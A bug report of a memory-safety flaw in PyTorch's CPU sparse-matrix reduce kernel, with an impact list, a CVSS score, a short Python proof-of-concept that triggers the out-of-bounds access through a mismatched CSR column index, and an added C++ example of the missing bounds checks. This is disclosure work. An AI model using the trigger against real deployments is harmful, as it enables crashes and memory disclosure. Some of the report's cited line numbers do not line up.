Bug
Resolution: Obsolete
Vulnerability Type: Out-of-Bounds Read/Write (CWE-119, CWE-125, CWE-787)
Location:
- File: aten/src/ATen/native/cpu/SpmmReduceKernel.cpp
- Line: 60
Details:
The _update function computes other_ptr = other_data + c * K, where c comes from col_indices[e], without bounds checking. If c >= other.size(0), this results in an out-of-bounds pointer. At lines 60-61, the code dereferences this out-of-bounds pointer, causing both out-of-bounds read and write operations.
Vulnerability chain:
1. Line 131: int64_t c = col_data[e] - read column index
2. Line 133: _update is called with c
3. Line 36 in _update: const scalar_t* other_ptr = other_data + c * K - OOB pointer calculation
4. Lines 44-61: Multiple dereferences of other_ptr[k] - OOB read/write
Impact:
- Memory corruption through out-of-bounds write at line 62
- Information disclosure through out-of-bounds read at line 60
- Potential code execution if attacker controls memory layout
- Denial of service through segmentation fault
- Can leak sensitive data from adjacent memory
- Can corrupt adjacent data structures
Exploit Code (first 50 lines):
```python
#!/usr/bin/env python3
import torch
import sys

def exploit_buffer_overflow():
    print("CVE Exploit: Out-of-Bounds Memory Access in torch.sparse.mm()")
    print("Location: aten/src/ATen/native/cpu/SpmmReduceKernel.cpp:60")

    # Create dimension mismatch
    crow_indices = torch.tensor([0, 1] + [1] * 9, dtype=torch.int64)
    col_indices = torch.tensor([5], dtype=torch.int64)
    values = torch.tensor([1.0], dtype=torch.float32)

    sparse_matrix = torch.sparse_csr_tensor(
        crow_indices=crow_indices,
        col_indices=col_indices,
        values=values,
        size=(10, 10),
        dtype=torch.float32,
        device='cpu'
    )

    dense_matrix = torch.randn(3, 4, dtype=torch.float32, device='cpu')
    result = torch.sparse.mm(sparse_matrix, dense_matrix, reduce='sum')
```
Severity: High
CVSS Score: 8.5 (AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Source File: /pytorch/results/exploit_cve2_buffer_overflow_spmm.py
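The validation that the vulnerability chain says is missing, as an added C++ example (not PyTorch's code and not part of the original report): a simplified stand-alone model of a CSR x dense sum kernel that checks the operand shapes, the row pointers and each column index c before forming other_ptr. The names spmm_sum_checked and SpmmStatus are hypothetical, and the input in main() is constructed to match the shapes in the report.

```cpp
#include <cstddef>
#include <cstdint>
#include <utility>
#include <vector>

// Hypothetical stand-alone model of a CSR x dense "sum" kernel (not ATen code).
enum class SpmmStatus { Ok, BadShape, BadRowPtr, BadColIndex };

// sparse is M x N in CSR form (crow, col, val); other is other_rows x K, row-major.
SpmmStatus spmm_sum_checked(const std::vector<int64_t>& crow,
                            const std::vector<int64_t>& col,
                            const std::vector<float>& val, int64_t M, int64_t N,
                            const std::vector<float>& other, int64_t other_rows,
                            int64_t K, std::vector<float>& out) {
  // Shape check: every valid column index is < N, so N must equal other's rows.
  if (M < 0 || N < 0 || K < 0 || other_rows != N) return SpmmStatus::BadShape;
  if (static_cast<int64_t>(other.size()) != other_rows * K) return SpmmStatus::BadShape;
  const int64_t nnz = static_cast<int64_t>(col.size());
  if (static_cast<int64_t>(crow.size()) != M + 1 || val.size() != col.size() ||
      crow[0] != 0 || crow[M] != nnz)
    return SpmmStatus::BadRowPtr;
  std::vector<float> acc(static_cast<std::size_t>(M * K), 0.0f);
  for (int64_t m = 0; m < M; ++m) {
    // Row pointers must be non-decreasing and stay inside [0, nnz].
    if (crow[m] > crow[m + 1] || crow[m + 1] > nnz) return SpmmStatus::BadRowPtr;
    for (int64_t e = crow[m]; e < crow[m + 1]; ++e) {
      const int64_t c = col[e];
      // The check the report says is missing: validate c before forming the pointer.
      if (c < 0 || c >= other_rows) return SpmmStatus::BadColIndex;
      const float* other_ptr = other.data() + c * K;
      for (int64_t k = 0; k < K; ++k) acc[m * K + k] += val[e] * other_ptr[k];
    }
  }
  out = std::move(acc);  // only publish results once every index has been validated
  return SpmmStatus::Ok;
}

int main() {
  // Constructed input with the report's shapes: 10x10 sparse, one entry at column 5, 3x4 dense.
  std::vector<int64_t> crow = {0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1}, col = {5};
  std::vector<float> val = {1.0f}, dense(3 * 4, 1.0f), out;
  return spmm_sum_checked(crow, col, val, 10, 10, dense, 3, 4, out) ==
                 SpmmStatus::BadShape ? 0 : 1;
}
```

With the report's shapes the call is rejected at the shape check; if the sparse operand is instead declared with 3 columns, the same column index 5 is rejected at the per-entry check.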